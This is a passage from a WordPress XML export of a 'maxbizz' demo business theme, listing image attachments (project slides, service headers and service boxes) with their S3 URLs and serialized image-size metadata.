		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-slide-3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-slide-3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:970;s:6:"height";i:580;s:4:"file";s:27:"2020/09/project-slide-3.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:27:"project-slide-3-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:27:"project-slide-3-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"project-slide-3-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:27:"project-slide-3-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:27:"project-slide-3-600x580.jpg";s:5:"width";i:600;s:6:"height";i:580;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-slide-2</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio/finance-strategy/project-slide-2/</link>
		<pubDate>Fri, 11 Sep 2020 07:18:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-slide-2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>844</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:18:39]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:18:39]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-slide-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>842</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-slide-2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-slide-2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:970;s:6:"height";i:580;s:4:"file";s:27:"2020/09/project-slide-2.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:27:"project-slide-2-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:27:"project-slide-2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"project-slide-2-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:27:"project-slide-2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:27:"project-slide-2-600x580.jpg";s:5:"width";i:600;s:6:"height";i:580;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-service</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-services/pheader-service/</link>
		<pubDate>Fri, 11 Sep 2020 08:07:01 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-service.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>869</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 08:07:01]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 08:07:01]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-service]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-service.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-service.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:27:"2020/09/pheader-service.jpg";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:26:"pheader-service-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:28:"pheader-service-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:27:"pheader-service-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"pheader-service-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:28:"pheader-service-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:27:"pheader-service-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:27:"pheader-service-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-service-grid</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-services/bg1-service-grid/</link>
		<pubDate>Fri, 11 Sep 2020 09:54:12 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-service-grid.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>878</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 09:54:12]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 09:54:12]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-service-grid]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-service-grid.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg1-service-grid.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:600;s:4:"file";s:28:"2020/09/bg1-service-grid.jpg";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:27:"bg1-service-grid-300x94.jpg";s:5:"width";i:300;s:6:"height";i:94;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:29:"bg1-service-grid-1024x320.jpg";s:5:"width";i:1024;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:28:"bg1-service-grid-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:28:"bg1-service-grid-768x240.jpg";s:5:"width";i:768;s:6:"height";i:240;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:29:"bg1-service-grid-1536x480.jpg";s:5:"width";i:1536;s:6:"height";i:480;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:28:"bg1-service-grid-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:28:"bg1-service-grid-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>deal</title>
		<link>http://wpdemo.archiwp.com/maxbizz/services-with-icon/deal/</link>
		<pubDate>Fri, 11 Sep 2020 10:22:49 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/deal.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>887</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 10:22:49]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 10:22:49]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[deal]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>885</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/deal.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/deal.svg]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-service-icon</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-core-values/bg1-service-icon/</link>
		<pubDate>Fri, 11 Sep 2020 10:31:03 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-service-icon.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>890</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 10:31:03]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 10:31:03]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-service-icon]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-service-icon.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg1-service-icon.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:767;s:4:"file";s:28:"2020/09/bg1-service-icon.jpg";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:28:"bg1-service-icon-300x120.jpg";s:5:"width";i:300;s:6:"height";i:120;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:29:"bg1-service-icon-1024x409.jpg";s:5:"width";i:1024;s:6:"height";i:409;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:28:"bg1-service-icon-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:28:"bg1-service-icon-768x307.jpg";s:5:"width";i:768;s:6:"height";i:307;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:29:"bg1-service-icon-1536x614.jpg";s:5:"width";i:1536;s:6:"height";i:614;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:28:"bg1-service-icon-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:28:"bg1-service-icon-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>service-box1</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-services/service-box1/</link>
		<pubDate>Mon, 14 Sep 2020 07:43:32 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/service-box1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>902</wp:post_id>
		<wp:post_date><![CDATA[2020-09-14 07:43:32]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-14 07:43:32]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[service-box1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/service-box1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/service-box1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:576;s:4:"file";s:24:"2020/09/service-box1.jpg";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:24:"service-box1-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"service-box1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"service-box1-768x508.jpg";s:5:"width";i:768;s:6:"height";i:508;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box1-600x576.jpg";s:5:"width";i:600;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}s:29:"woocommerce_gallery_thumbnail";a:4:{s:4:"file";s:24:"service-box1-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:24:"service-box1-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>service-box2</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-services/service-box2/</link>
		<pubDate>Mon, 14 Sep 2020 07:43:33 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/service-box2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>903</wp:post_id>
		<wp:post_date><![CDATA[2020-09-14 07:43:33]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-14 07:43:33]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[service-box2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/service-box2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/service-box2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:576;s:4:"file";s:24:"2020/09/service-box2.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:24:"service-box2-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"service-box2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"service-box2-768x508.jpg";s:5:"width";i:768;s:6:"height";i:508;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box2-600x576.jpg";s:5:"width";i:600;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>service-box3</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-services/service-box3/</link>
		<pubDate>Mon, 14 Sep 2020 07:43:35 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/service-box3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>904</wp:post_id>
		<wp:post_date><![CDATA[2020-09-14 07:43:35]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-14 07:43:35]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[service-box3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/service-box3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/service-box3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:576;s:4:"file";s:24:"2020/09/service-box3.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:24:"service-box3-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"service-box3-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"service-box3-768x508.jpg";s:5:"width";i:768;s:6:"height";i:508;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box3-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box3-600x576.jpg";s:5:"width";i:600;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>service-box4</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-services/service-box4/</link>
		<pubDate>Mon, 14 Sep 2020 07:43:36 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/service-box4.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>905</wp:post_id>
		<wp:post_date><![CDATA[2020-09-14 07:43:36]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-14 07:43:36]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[service-box4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/service-box4.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/service-box4.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:576;s:4:"file";s:24:"2020/09/service-box4.jpg";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:24:"service-box4-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"service-box4-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"service-box4-768x508.jpg";s:5:"width";i:768;s:6:"height";i:508;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box4-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box4-600x576.jpg";s:5:"width";i:600;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}s:29:"woocommerce_gallery_thumbnail";a:4:{s:4:"file";s:24:"service-box4-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:24:"service-box4-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s